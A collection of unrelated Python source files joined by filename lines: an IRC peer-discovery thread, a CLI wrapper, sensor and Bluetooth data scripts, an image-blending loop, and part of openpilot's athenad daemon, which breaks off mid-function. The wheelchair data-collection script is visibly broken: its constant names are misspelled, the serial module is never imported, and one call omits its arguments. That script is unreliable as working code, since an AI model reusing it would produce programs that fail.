# if earliest_start_time_op_pred <= job_constraint_op_pred + pend_time_op_pred:
start_time_op_cur = earliest_start_time_op_pred
pend_time_op_cur = pend_time_op_pred
ind_op_backward = ind_op_backward - 1
# while ind_op_backward > 0:
return sentinel_feasible, start_time_ops_trial, end_time_ops_trial, start_time_op_macs_trial, end_time_op_macs_trial
# def priority_backward
|
cli_session.py
|
import sys
from threading import Thread
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty # python 3.x
ON_POSIX = 'posix' in sys.builtin_module_names
class CliSession():
def __init__(self, process):
self.process = process
self.stdout = Queue()
self.stderr = Queue()
self.thread_out = Thread(target=self.__enqueue_output, args=(process.stdout, self.stdout))
self.thread_err = Thread(target=self.__enqueue_output, args=(process.stderr, self.stderr))
for t in [ self.thread_out, self.thread_err ]:
t.daemon = True
t.start()
self.__outputs = []
self.__errors = []
def do(self, query):
# Reads whatever remains in stdout/stderr
self.__read_all()
self.process.stdin.write(query + ';\n')
return self
def last_output(self):
self.__read_output()
return self.__outputs[-1]
def last_error(self):
self.__read_errors()
return self.__errors[-1]
def outputs(self):
self.__read_output()
return self.__outputs
def errors(self):
self.__read_errors()
return self.__errors
def has_errors(self):
self.__read_errors()
for err in self.__errors:
if 'WARNING' not in err and err != '':
return True
return False
def close(self):
self.process.stdin.write('quit;\n')
self.process.wait()
def __read_all(self):
self.__read_output()
self.__read_errors()
def __read_output(self):
r = self.__read(self.stdout)
if r:
self.__outputs.append(r)
def __read_errors(self):
r = self.__read(self.stderr)
if r:
self.__errors.append(r)
def __read(self, queue):
output = None
while True:
try:
line = queue.get(timeout=.2)
except Empty:
return output
else:
output = line if output is None else output + line
def __enqueue_output(self, out, queue):
for line in iter(out.readline, ''):
queue.put(line)
out.close()
|
ircthread.py
|
#!/usr/bin/env python
# Copyright(C) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import time
import socket
import ssl
import threading
import Queue
import irc.client
from utils import logger
from utils import Hash
from version import VERSION
out_msg = []
class IrcThread(threading.Thread):
def __init__(self, processor, config):
threading.Thread.__init__(self)
self.processor = processor
self.daemon = True
options = dict(config.items('server'))
self.stratum_tcp_port = options.get('stratum_tcp_port')
self.stratum_tcp_ssl_port = options.get('stratum_tcp_ssl_port')
self.report_stratum_tcp_port = options.get('report_stratum_tcp_port')
self.report_stratum_tcp_ssl_port = options.get('report_stratum_tcp_ssl_port')
self.irc_bind_ip = options.get('irc_bind_ip')
self.host = options.get('host')
self.report_host = options.get('report_host')
self.nick = options.get('irc_nick')
if self.report_stratum_tcp_port:
self.stratum_tcp_port = self.report_stratum_tcp_port
if self.report_stratum_tcp_ssl_port:
self.stratum_tcp_ssl_port = self.report_stratum_tcp_ssl_port
if self.report_host:
self.host = self.report_host
if not self.nick:
self.nick = Hash(self.host)[:5].encode("hex")
self.pruning = True
self.pruning_limit = config.get('leveldb', 'pruning_limit')
self.nick = 'EL_' + self.nick
self.password = None
self.who_queue = Queue.Queue()
def getname(self):
s = 'v' + VERSION + ' '
if self.pruning:
s += 'p' + self.pruning_limit + ' '
def add_port(letter, number):
DEFAULT_PORTS = {'t':'50001', 's':'50002'}
if not number: return ''
if DEFAULT_PORTS[letter] == number:
return letter + ' '
else:
return letter + number + ' '
s += add_port('t',self.stratum_tcp_port)
s += add_port('s',self.stratum_tcp_ssl_port)
return s
def start(self, queue):
self.queue = queue
threading.Thread.start(self)
def on_connect(self, connection, event):
connection.join("#electrum-ltc")
def on_join(self, connection, event):
m = re.match("(EL_.*)!", event.source)
if m:
self.who_queue.put((connection, m.group(1)))
def on_quit(self, connection, event):
m = re.match("(EL_.*)!", event.source)
if m:
self.queue.put(('quit', [m.group(1)]))
def on_kick(self, connection, event):
m = re.match("(EL_.*)", event.arguments[0])
if m:
self.queue.put(('quit', [m.group(1)]))
def on_disconnect(self, connection, event):
logger.error("irc: disconnected")
raise BaseException("disconnected")
def on_who(self, connection, event):
line = str(event.arguments[6]).split()
try:
ip = socket.gethostbyname(line[1])
except:
# no IPv4 address could be resolved. Could be .onion or IPv6.
ip = line[1]
nick = event.arguments[4]
host = line[1]
ports = line[2:]
self.queue.put(('join', [nick, ip, host, ports]))
def on_name(self, connection, event):
for s in event.arguments[2].split():
if s.startswith("EL_"):
self.who_queue.put((connection, s))
def who_thread(self):
while not self.processor.shared.stopped():
try:
connection, s = self.who_queue.get(timeout=1)
except Queue.Empty:
continue
#logger.info("who: "+ s)
connection.who(s)
time.sleep(1)
def run(self):
while self.processor.shared.paused():
time.sleep(1)
self.ircname = self.host + ' ' + self.getname()
# avoid UnicodeDecodeError using LenientDecodingLineBuffer
irc.client.ServerConnection.buffer_class = irc.buffer.LenientDecodingLineBuffer
logger.info("joining IRC")
t = threading.Thread(target=self.who_thread)
t.start()
while not self.processor.shared.stopped():
client = irc.client.Reactor()
try:
#bind_address = (self.irc_bind_ip, 0) if self.irc_bind_ip else None
#ssl_factory = irc.connection.Factory(wrapper=ssl.wrap_socket, bind_address=bind_address)
#c = client.server().connect('irc.freenode.net', 6697, self.nick, self.password, ircname=self.ircname, connect_factory=ssl_factory)
c = client.server().connect('irc.freenode.net', 6667, self.nick, self.password, ircname=self.ircname)
except irc.client.ServerConnectionError:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
c.add_global_handler("welcome", self.on_connect)
c.add_global_handler("join", self.on_join)
c.add_global_handler("quit", self.on_quit)
c.add_global_handler("kick", self.on_kick)
c.add_global_handler("whoreply", self.on_who)
c.add_global_handler("namreply", self.on_name)
c.add_global_handler("disconnect", self.on_disconnect)
c.set_keepalive(60)
self.connection = c
try:
client.process_forever()
except BaseException as e:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
logger.info("quitting IRC")
|
Collect_and_labelV1.1.0.py
|
import pygatt # To access BLE GATT support
import signal # To catch the Ctrl+C and end the program properly
import os # To access environment variables
from dotenv import load_dotenv # To load the environment variables from the .env file
from random import random # Import required library for serial
import time
from threading import Thread
import pexpect
import sys
from dcd.entities.thing import Thing # DCD Hub
from dcd.entities.property_type import PropertyType
load_dotenv() # The thing ID and access token
THING_ID = os.environ['THING_ID']
THING_TOKEN = os.environ['THING_TOKEN']
CLASSES = ["Passing", "Adjustment", "Fakeout", "Throw", "Sprint"] # Movement classes
LABEL_PROP_NAME = "Movement"
PROPETY_HRM_NAME = "My heart rate measurement 1"
PROPETY_ORIENTATION_NAME = "Right Sports Wheel Arbeid"
PROPETY_WHEELCHAIR_NAME = "Chair base"
MAX_SAMPLES = 100 # How many samples do we want for each class
DELAY_BETWEEN_MOVEMENT = 15 # How much time (in seconds) to leave between the collection of each class
BLUETOOTH_DEVICE_MAC_WHEEL = os.environ['BLUETOOTH_DEVICE_MAC_WHEEL']
GATT_CHARACTERISTIC_ORIENTATION = "02118833-4455-6677-8899-AABBCCDDEEFF" # UUID of the GATT characteristic to subscribe
ADDRESS_TYPE = pygatt.BLEAddressType.random # Many devices, e.g. Fitbit, use random addressing, this is required to connect.
# Instantiate a thing with its credential
my_thing = Thing(thing_id=THING_ID, token=THING_TOKEN)
# Read the details of our Thing from the DCD Hub to get property details
my_thing.read()
# Find label and data property by name
prop_label = my_thing.find_or_create(LABEL_PROP_NAME, PropertyType.CLASS)
prop_orientation = my_thing.find_or_create(PROPERTY_ORIENTATION_NAME, PropertyType.THREE_DIMENSIONS)
prop_hrm = my_thing.find_or_create(PROPERTY_HRM_NAME, PropertyType.ONE)
prop_wheelchair = my_thing.find_or_create(PROPERTY_WHEELCHAIR_NAME, PropertyType.THREE_DIMENSIONS)
# OPEN Serial
def open_serial(): # Open a serial connection
# Start reading the serial port
return serial.Serial(
port=os.environ['SERIAL'],
baudrate=9600,
timeout=2)
# BLE
def handle_orientation_data(handle, value_bytes): # print wheel values, send to server
"""
handle -- integer, characteristic read handle the data was received on
value_bytes -- bytearray, the data returned in the notification
"""
print("Received data: %s (handle %d)" % (str(value_bytes), handle))
values = [float(x) for x in value_bytes.decode('utf-8').split(",")]
prop_orientation.update_values(values)
def discover_characteristic(device): # Provide UUID
"""List characteristics of a device"""
for uuid in device.discover_characteristics().keys():
try:
print("Read UUID" + str(uuid) + " " + str(device.char_read(uuid)))
except:
print("Something wrong with " + str(uuid))
def read_characteristic(device, characteristic_id): # return BLE characteristic
"""Read a characteristic"""
return device.char_read(characteristic_id)
def keyboard_interrupt_handler(signal_num, frame): #Provide interrupt
"""Make sure we close our program properly"""
print("Exiting...".format(signal_num))
left_wheel.unsubscribe(GATT_CHARACTERISTIC_ORIENTATION)
ser.close()
child.sendline("char-write-req 0x000f 0000")
exit(0)
# HRM
def hexStrToInt(hexstr):
val = int(hexstr[3:5], 16) #
if ((val & 0x8000) == 0x8000): # treat signed 16bits
val = -((val ^ 0xffff) + 1)
val = int(val)
return val
# LABEL
def collect(class_index): #Collect data
# if we covered all classes, stop the program
if class_index >= len(CLASSES):
print("Data collection done.")
exit()
# Prompt the user to get ready and wait
print("Get ready to collect the MOVEMENT: " + CLASSES[class_index]
+ " in " + str(DELAY_BETWEEN_MOVEMENT) + " seconds!")
time.sleep(DELAY_BETWEEN_MOVEMENT)
# Open the serial connection
print("Collecting data for MOVEMENT " + CLASSES[class_index])
ser = open_serial()
# Start reading serial port with the MOVEMENT index, start at sample 0.
sample = 0
while sample < MAX_SAMPLES:
if serial_to_property_values(class_index, ser):
sample += 1
print()
ser.close()
collect(class_index + 1)
def serial_to_property_values(class_index, ser): #Add label to data
# Read one line
line_bytes = ser.readline()
# If the line is not empty
if len(line_bytes) > 0:
# Convert the bytes into string
line = line_bytes.decode('utf-8')
# Split the string using commas as separator, we get a list of strings
str_values = line.split(',')
# Remove the first id
# str_values.pop(0)
# Transform the array of string values into float values (numbers)
values = [float(x) for x in str_values]
# get the current time in milliseconds
current_ts_ms = int(round(time.time() * 1000))
# Update values of data and label properties (send them to the DCD Hub)
# With the same timestamp, so we can easily connect label and raw data later
prop_label.update_values([class_index], current_ts_ms)
prop_wheelchair.update_values(values, current_ts_ms)
return True
return False
bleAdapter = pygatt.GATTToolBackend() # Start a BLE adapter
bleAdapter.start()
left_wheel = bleAdapter.connect(BLUETOOTH_DEVICE_MAC_WHEEL, address_type=ADDRESS_TYPE) # Use the BLE adapter to connect to our device
signal.signal(signal.SIGINT, keyboard_interrupt_handler) # Register our Keyboard handler to exit
#end BLE code
#start of Heartratemonitor CODE
#put your hrm mac address here
hrmMacAddress = "C5:46:4C:2F:AD:C6"
# Show the property
#print(my_property.to_json())
# Spawn a child process with gatttool to control your BLE device.
#Your hrm uses random addressing like most BLE devices.
#gatttool is the application within debian(your rpi operating system)
#to communicate with BLE devices. Other single alhabets are flags that you do
#do not need to know of
child = pexpect.spawn("sudo gatttool -t random -b {0} -I".format(hrmMacAddress) )
#Connect to hrm
print("Searching for HRM")
print("Connecting...")
# The number of times you want to retry connecting before you give up
RETRY_CONNECTION = 2
while True:
try:
child.sendline("connect")
child.expect("Connection successful", timeout=5)
except pexpect.TIMEOUT:
RETRY_CONNECTION = RETRY_CONNECTION - 1
if (RETRY_CONNECTION > 0):
print("timeout, trying again")
continue
else:
print("timeout, giving up.")
break
else:
print("Connected!")
break
#enable notification. 0x000f is found experimentally. You do not need to know this bit
#unless you are curious. 0100 is to switch on notifications for the particular characteristic.
child.sendline("char-write-req 0x000f 0100")
#end of hrm code
# START COLLECTING
# Start collecting data for the first class
collect(0)
# END OF COLLECTING
def start_gatt():
# Subscribe to the GATT service of the wheel
left_wheel.subscribe(GATT_CHARACTERISTIC_ORIENTATION,
callback=handle_orientation_data)
def start_serial():
while True:
serial_to_property_values()
def start_HRM():
while True:
try:
child.expect("Notification handle = 0x000e value: ", timeout=5)
child.expect("\r\n", timeout=5)
print(child.before)
intvalue = hexStrToInt(child.before)
intvalue_brackets = [intvalue]
#print statement to check the hrm reading
print(intvalue)
#udate new readings to grafana
prop_hrm.update_values(intvalue_brackets)
ser.write(str(intvalue).encode())
ser.write(",".encode()) # this one gave no errors
# ser.write(','.encode())
print("HRM sent to arduino")
except KeyboardInterrupt:
print("Exiting...")
# Unsubscribe from characteristic before exiting program
child.sendline("char-write-req 0x000f 0000")
exit(0)
thread_gatt = Thread(target=start_gatt)
thread_gatt.start()
thread_serial = Thread(target=start_serial)
thread_serial.start()
thread_HRM = Thread(target=start_HRM)
thread_HRM.start()
#End of threading
|
async.py
|
from modules import renderer, Path
#from utils import alphaBlend
import time
import numpy as np
from multiprocessing import Queue, Process
import cv2
import os
'''def alphaBlend(top, bottom):
# takes an HSLA top and a bottom, blends and returns a HSL image
#assert top.shape[0] == 4, "top must have alpha channel"
#assert top.shape[1] == bottom.shape[1], "top and bottom must have equal shape"
#assert top.shape[2] == bottom.shape[2], "top and bottom must have equal shape"
foreground = top[0:3].astype(float)
background = bottom.astype(float)
s = time.time()
alpha = np.stack((top[3].astype(float), top[3].astype(float), top[3].astype(float))) /255
print("time cost of stacking", time.time() - s)
foreground = cv2.multiply(alpha, foreground)
background = cv2.multiply(1.0 - alpha, background)
return cv2.add(foreground, background)'''
def alphaBlend(top, bottom):
'''
takes an HSLA top and a bottom, blends and returns a HSL image
'''
#assert top.shape[0] == 4, "top must have alpha channel"
#assert top.shape[1] == bottom.shape[1], "top and bottom must have equal shape"
#assert top.shape[2] == bottom.shape[2], "top and bottom must have equal shape"
s = time.time()
a = np.divide(top[3].astype(float), 255)
b = np.subtract(1, a)
final = np.add(np.multiply(top[0:3], a), np.multiply(bottom, b)).astype(np.uint8)
print("time cost of stacking", time.time() - s)
return final
if __name__ == '__main__':
res = [1000, 1000]
master_dict = {} # {pathID:[path object, render process, input q, output q]}
BG = np.vstack([[np.ones(res)*179], [np.ones(res)*10], [np.ones(res)*100]])
rendering_sequence = range(17) #change layer order here
in_q = Queue()
out_q = Queue()
for i in range(8):
process = Process(target=renderer, args=(in_q, out_q))
process.start()
for i in range(17):
master_dict[i] = Path(map_resolution=res)
print("PathManager initialization complete.")
#===============================================================================================================================
#start a queue and spwan the rcnn inference process
from model import getPointsAsync
point_list_queue = Queue()
inference_process = Process(target=getPointsAsync, args=(point_list_queue,))
inference_process.start()
#===============================================================================================================================
t_start = 0 # time for fps
print("starting main loop")
counter = 0
while True:
ovall_start = time.time()
fps = int(1 / (time.time() - t_start))
t_start = time.time()
img, point_list = point_list_queue.get()
#===============================================================================================================================
for pt in point_list:
master_dict[int(pt[0])].addPoint([int(pt[1]), int(pt[2])])
# loop through all 17 items to: get render parameters from Path and put into inp q
for i, path in enumerate(master_dict.values()):
render_data = path.renderData()
in_q.put([i, render_data])
# perform alpha blending to the layer according to the redering sequence
rendered_layers = list(range(17)) # will be in the numerical indexing order
# retrieve rendered layers from out q and put into rendered_layers for blending
for _ in range(len(master_dict)):
rendered_layer = out_q.get()
rendered_layers[rendered_layer[0]] = rendered_layer[1]
bottom_layer = np.transpose(cv2.cvtColor(img, cv2.COLOR_RGB2HSV), [2, 1, 0])
for i in rendering_sequence:
bottom_layer = alphaBlend(rendered_layers[i], bottom_layer)
bottom_layer = np.transpose(bottom_layer, [2, 1, 0])
bottom_layer = bottom_layer.astype(np.uint8)
rendered_img = cv2.cvtColor(bottom_layer, cv2.COLOR_HSV2RGB)
print("image blending complete")
cv2.imwrite(os.path.join(r"I:\TRS Project 2\async_video_out", str(counter)+".jpg"), rendered_img)
counter += 1
#===============================================================================================================================
|
eNoseConnector.py
|
import re
from threading import Thread
from .EventHook import EventHook
from threading import Lock
import serial
import serial.tools.list_ports
import sys
class eNoseConnector:
""" Connects to an eNose on the given port with the given baudrate.
Parses the input in a new thread and updates its values accordingly.
After each full received frame, the onUpdate is triggered.
Use onUpdate like this: connector.onUpdate += <callbackMethod>"""
def __init__(self, port: str = None, baudrate: int = 115200, channels: int = 64):
self.onUpdate: EventHook = EventHook()
self.finished = False
self.sensorValues = [0.0] * channels
self.channels = channels
# self._readerThread = Thread(target=self._readLoop, daemon=True)
# self._readerThreadRun = False
# port = '/dev/ttyUSB0'
if port is None:
port = self.find_port()
self.ser = serial.Serial(
port=port,
baudrate=baudrate,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=10)
# self._readerThreadRun = True
# self._readerThread.start()
print("Reading data started")
def __del__(self):
print('Closing...')
self.finished = True
# if self._readerThreadRun:
# self._readerThreadRun = False
# self._readerThread.join()
try:
self.ser.close()
except Exception:
pass
def readLoop(self):
print('Read Loop started')
while not self.finished:
try:
line = self.ser.readline()
# line looks like: count=___,var1=____._,var2=____._,....
match = re.match(b'^count=([0-9]+),(var.+)$', line)
if match is not None:
self.channels = int(match.group(1))
sensors_data = match.group(2)
self.sensorValues = [float(d.split(b'=')[1]) for d in sensors_data.split(b',')]
print("received data for %i sensors (actually %i)" % (self.channels, len(self.sensorValues)))
self.onUpdate()
else:
print('line: ', line)
except KeyboardInterrupt:
print('Interrupted, closing...')
self.finished = True
except:
print('Exception raised')
print('Read Loop finished')
@staticmethod
def find_port():
""" Searches all serial ports for a connected eNose and returns the port if found, None otherwise"""
ports = list(serial.tools.list_ports.comports())
port = None
for p in ports:
print('Checking port %s / %s' % (p[0], p[1]))
if "CP2102" in p[1]:
port = p
break
if port is None:
print('Could not find a connected eNose')
return None
print('Using the eNose connected on:')
print(port[0] + ' / ' + port[1])
return port[0]
if __name__ == '__main__':
connector = eNoseConnector()
connector.readLoop()
def onUpdate():
print('sensor values: ', connector.sensorValues)
connector.onUpdate += onUpdate
|
athenad.py
|
#!/usr/bin/env python3
import base64
import hashlib
import io
import json
import os
import queue
import random
import select
import socket
import subprocess
import sys
import tempfile
import threading
import time
from collections import namedtuple
from datetime import datetime
from functools import partial
from typing import Any, Dict
import requests
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import (ABNF, WebSocketException, WebSocketTimeoutException,
create_connection)
import cereal.messaging as messaging
from cereal import log
from cereal.services import service_list
from common.api import Api
from common.basedir import PERSIST
from common.file_helpers import CallbackReader
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE, PC, TICI
from selfdrive.loggerd.config import ROOT
from selfdrive.loggerd.xattr_cache import getxattr, setxattr
from selfdrive.statsd import STATS_DIR
from selfdrive.swaglog import SWAGLOG_DIR, cloudlog
from selfdrive.version import get_commit, get_origin, get_short_branch, get_version
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://athena.comma.ai')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4"))
LOCAL_PORT_WHITELIST = {8022}
LOG_ATTR_NAME = 'user.upload'
LOG_ATTR_VALUE_MAX_UNIX_TIME = int.to_bytes(2147483647, 4, sys.byteorder)
RECONNECT_TIMEOUT_S = 70
RETRY_DELAY = 10 # seconds
MAX_RETRY_COUNT = 30 # Try for at most 5 minutes if upload fails immediately
MAX_AGE = 31 * 24 * 3600 # seconds
WS_FRAME_SIZE = 4096
NetworkType = log.DeviceState.NetworkType
dispatcher["echo"] = lambda s: s
recv_queue: Any = queue.Queue()
send_queue: Any = queue.Queue()
upload_queue: Any = queue.Queue()
low_priority_send_queue: Any = queue.Queue()
log_recv_queue: Any = queue.Queue()
cancelled_uploads: Any = set()
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id', 'retry_count', 'current', 'progress', 'allow_cellular'], defaults=(0, False, 0, False))
cur_upload_items: Dict[int, Any] = {}
class AbortTransferException(Exception):
pass
class UploadQueueCache():
params = Params()
@staticmethod
def initialize(upload_queue):
try:
upload_queue_json = UploadQueueCache.params.get("AthenadUploadQueue")
if upload_queue_json is not None:
for item in json.loads(upload_queue_json):
upload_queue.put(UploadItem(**item))
except Exception:
cloudlog.exception("athena.UploadQueueCache.initialize.exception")
@staticmethod
def cache(upload_queue):
try:
items = [i._asdict() for i in upload_queue.queue if i.id not in cancelled_uploads]
UploadQueueCache.params.put("AthenadUploadQueue", json.dumps(items))
except Exception:
cloudlog.exception("athena.UploadQueueCache.cache.exception")
def handle_long_poll(ws):
end_event = threading.Event()
threads = [
threading.Thread(target=ws_recv, args=(ws, end_event), name='ws_recv'),
threading.Thread(target=ws_send, args=(ws, end_event), name='ws_send'),
threading.Thread(target=upload_handler, args=(end_event,), name='upload_handler'),
threading.Thread(target=log_handler, args=(end_event,), name='log_handler'),
threading.Thread(target=stat_handler, args=(end_event,), name='stat_handler'),
] + [
threading.Thread(target=jsonrpc_handler, args=(end_event,), name=f'worker_{x}')
for x in range(HANDLER_THREADS)
]
for thread in threads:
thread.start()
try:
while not end_event.is_set():
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
end_event.set()
raise
finally:
for thread in threads:
cloudlog.debug(f"athena.joining {thread.name}")
thread.join()
def jsonrpc_handler(end_event):
dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
while not end_event.is_set():
try:
data = recv_queue.get(timeout=1)
if "method" in data:
cloudlog.debug(f"athena.jsonrpc_handler.call_method {data}")
response = JSONRPCResponseManager.handle(data, dispatcher)
send_queue.put_nowait(response.json)
elif "id" in data and ("result" in data or "error" in data):
log_recv_queue.put_nowait(data)
else:
raise Exception("not a valid request or response")
except queue.Empty:
pass
except Exception as e:
cloudlog.exception("athena jsonrpc handler failed")
send_queue.put_nowait(json.dumps({"error": str(e)}))
def retry_upload(tid: int, end_event: threading.Event, increase_count: bool = True) -> None:
if cur_upload_items[tid].retry_count < MAX_RETRY_COUNT:
item = cur_upload_items[tid]
new_retry_count = item.retry_count + 1 if increase_count else item.retry_count
item = item._replace(
retry_count=new_retry_count,
progress=0,
current=False
)
upload_queue.put_nowait(item)
UploadQueueCache.cache(upload_queue)
cur_upload_items[tid] = None
for _ in range(RETRY_DELAY):
time.sleep(1)
if end_event.is_set():
break
def upload_handler(end_event: threading.Event) -> None:
sm = messaging.SubMaster(['deviceState'])
tid = threading.get_ident()
while not end_event.is_set():
cur_upload_items[tid] = None
try:
cur_upload_items[tid] = upload_queue.get(timeout=1)._replace(current=True)
if cur_upload_items[tid].id in cancelled_uploads:
cancelled_uploads.remove(cur_upload_items[tid].id)
continue
# Remove item if too old
age = datetime.now() - datetime.fromtimestamp(cur_upload_items[tid].created_at / 1000)
if age.total_seconds() > MAX_AGE:
cloudlog.event("athena.upload_handler.expired", item=cur_upload_items[tid], error=True)
continue
# Check if uploading over cell is allowed
sm.update(0)
cell = sm['deviceState'].networkType not in [NetworkType.wifi, NetworkType.ethernet]
if cell and (not cur_upload_items[tid].allow_cellular):
retry_upload(tid, end_event, False)
continue
try:
def cb(sz, cur):
# Abort transfer if connection changed to cell after starting upload
sm.update(0)
cell = sm['deviceState'].networkType not in [NetworkType.wifi, NetworkType.ethernet]
if cell and (not cur_upload_items[tid].allow_cellular):
raise AbortTransferException
cur_upload_items[tid] = cur_upload_items[tid]._replace(progress=cur / sz if sz else 1)
network_type = sm['deviceState'].networkType.raw
fn = cur_upload_items[tid].path
try:
sz = os.path.getsize(fn)
except OSError:
sz = -1
cloudlog.event("athena.upload_handler.upload_start", fn=fn, sz=sz, network_type=network_type)
response = _do_upload(cur_upload_items[tid], cb)
if response.status_code not in (200, 201, 403, 412):
cloudlog.event("athena.upload_handler.retry", status_code=response.status_code, fn=fn, sz=sz, network_type=network_type)
retry_upload(tid, end_event)
else:
cloudlog.event("athena.upload_handler.success", fn=fn, sz=sz, network_type=network_type)
UploadQueueCache.cache(upload_queue)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError, requests.exceptions.SSLError):
cloudlog.event("athena.upload_handler.timeout", fn=fn, sz=sz, network_type=network_type)
retry_upload(tid, end_event)
except AbortTransferException:
cloudlog.event("athena.upload_handler.abort", fn=fn, sz=sz, network_type=network_type)
retry_upload(tid, end_event, False)
except queue.Empty:
pass
except Exception:
cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item, callback=None):
with open(upload_item.path, "rb") as f:
size = os.fstat(f.fileno()).st_size
if callback:
f = CallbackReader(f, callback, size)
return requests.put(upload_item.url,
data=f,
headers={**upload_item.headers, 'Content-Length': str(size)},
timeout=30)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
if service is None or service not in service_list:
raise Exception("invalid service")
socket = messaging.sub_sock(service, timeout=timeout)
ret = messaging.recv_one(socket)
if ret is None:
raise TimeoutError
return ret.to_dict()
@dispatcher.add_method
def getVersion():
return {
"version": get_version(),
"remote": get_origin(),
"branch": get_short_branch(),
"commit": get_commit(),
}
@dispatcher.add_method
def setNavDestination(latitude=0, longitude=0, place_name=None, place_details=None):
destination = {
"latitude": latitude,
"longitude": longitude,
"place_name": place_name,
"place_details": place_details,
}
Params().put("NavDestination", json.dumps(destination))
return {"success": 1}
def scan_dir(path, prefix):
files = list()
# only walk directories that match the prefix
# (glob and friends traverse entire dir tree)
with os.scandir(path) as i:
for e in i:
rel_path = os.path.relpath(e.path, ROOT)
if e.is_dir(follow_symlinks=False):
# add trailing slash
rel_path = os.path.join(rel_path, '')
# if prefix is a partial dir name, current dir will start with prefix
# if prefix is a partial file name, prefix with start with dir name
if rel_path.startswith(prefix) or prefix.startswith(rel_path):
files.extend(scan_dir(e.path, prefix))
else:
if rel_path.startswith(prefix):
files.append(rel_path)
return files
@dispatcher.add_method
def listDataDirectory(prefix=''):
return scan_dir(ROOT, prefix)
@dispatcher.add_method
def reboot():
sock = messaging.sub_sock("deviceState", timeout=1000)
ret = messaging.recv_one(sock)
if ret is None or ret.deviceState.started:
raise Exception("Reboot unavailable")
def do_reboot():
time.sleep(2)
HARDWARE.reboot()
threading.Thread(target=do_reboot).start()
return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
return uploadFilesToUrls([{
"fn": fn,
"url": url,
"headers": headers,
}])
@dispatcher.add_method
def uploadFilesToUrls(files_data):
items = []
failed = []
for file in files_data:
fn = file.get('fn', '')
if len(fn) == 0 or fn[0] == '/' or '..' in fn or 'url' not in file:
failed.append(fn)
continue
path = os.path.join(ROOT, fn)
if not os.path.exists(path):
failed.append(fn)
continue
item = UploadItem(
path=path,
url=file['url'],
headers=file.get('headers', {}),
created_at=int(time.time() * 1000),
id=None,
allow_cellular=file.get('allow_cellular', False),
)
upload_id = hashlib.sha1(str(item).encode()).hexdigest()
item = item._replace(id=upload_id)
upload_queue.put_nowait(item)
items.append(item._asdict())
UploadQueueCache.cache(upload_queue)
resp = {"enqueued": len(items), "items": items}
if failed:
resp["failed"] = failed
return resp
@dispatcher.add_method
def listUploadQueue():
items = list(upload_queue.queue) + list(cur_upload_items.values())
return [i._asdict() for i in items if (i is not None) and (i.id not in cancelled_uploads)]
@dispatcher.add_method
def cancelUpload(upload_id):
if not isinstance(upload_id, list):
upload_id = [upload_id]
uploading_ids = {item.id for item in list(upload_queue.queue)}
cancelled_ids = uploading_ids.intersection(upload_id)
if len(cancelled_ids) == 0:
return 404
cancelled_uploads.update(cancelled_ids)
return {"success": 1}
@dispatcher.add_method
def primeActivated(activated):
return {"success": 1}
@dispatcher.add_method
def setBandwithLimit(upload_speed_kbps, download_speed_kbps):
if not TICI:
return {"success": 0, "error": "only supported on comma three"}
try:
HARDWARE.set_bandwidth_limit(upload_speed_kbps, download_speed_kbps)
return {"success": 1}
except subprocess.CalledProcessError as e:
return {"success": 0, "error": "failed to set limit", "stdout": e.stdout, "stderr": e.stderr}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
try:
if local_port not in LOCAL_PORT_WHITELIST:
raise Exception("Requested local port not whitelisted")
cloudlog.debug("athena.startLocalProxy.starting")
dongle_id = Params().get("DongleId").decode('utf8')
identity_token = Api(dongle_id).get_token()
ws = create_connection(remote_ws_uri,
cookie="jwt=" + identity_token,
enable_multithread=True)
ssock, csock = socket.socketpair()
local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_sock.connect(('127.0.0.1', local_port))
local_sock.setblocking(0)
proxy_end_event = threading.Event()
threads = [
threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
]
for thread in threads:
thread.start()
cloudlog.debug("athena.startLocalProxy.started")
return {"success": 1}
except Exception as e:
cloudlog.exception("athenad.startLocalProxy.exception")
raise e
@dispatcher.add_method
def getPublicKey():
if not os.path.isfile(PERSIST + '/comma/id_rsa.pub'):
return None
with open(PERSIST + '/comma/id_rsa.pub') as f:
return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
return HARDWARE.get_sim_info()
@dispatcher.add_method
def getNetworkType():
return HARDWARE.get_network_type()
@dispatcher.add_method
def getNetworks():
return HARDWARE.get_networks()
@dispatcher.add_method
def takeSnapshot():
